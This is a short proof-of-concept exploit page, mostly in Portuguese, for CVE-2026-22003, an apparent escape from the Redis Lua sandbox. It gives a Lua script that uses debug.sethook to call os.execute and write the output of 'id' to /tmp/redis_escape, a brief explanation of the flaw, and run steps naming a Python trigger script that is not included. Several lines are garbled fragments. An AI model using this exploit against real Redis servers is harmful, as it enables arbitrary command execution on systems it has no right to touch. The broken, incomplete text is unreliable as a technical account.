
Exploit de prova de conceito para CVE-2026-22003 demonstrando fuga da sandbox Lua do Redis via debug.sethook para executar comandos arbitrários do sistema.
debug.sethook-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
debug.sethook(function()
-- This hook runs in a privileged context
os.execute("id > /tmp/redis_escape")
end, "r")
local a = 1
end
return escape()
A sandbox Lua do Redis não desabilita corretamente a função debug.sethook. Um atacante que possa executar scripts Lua pode instalar um hook que executa em um contexto privilegiado e escapar da sandbox para executar comandos arbitrários no sistema.
os.execute ou funções similares.EVAL).pip install redis
python trigger_redis_sandbox_escape.py
The file /tmp/redis_escape is created, proving command execution.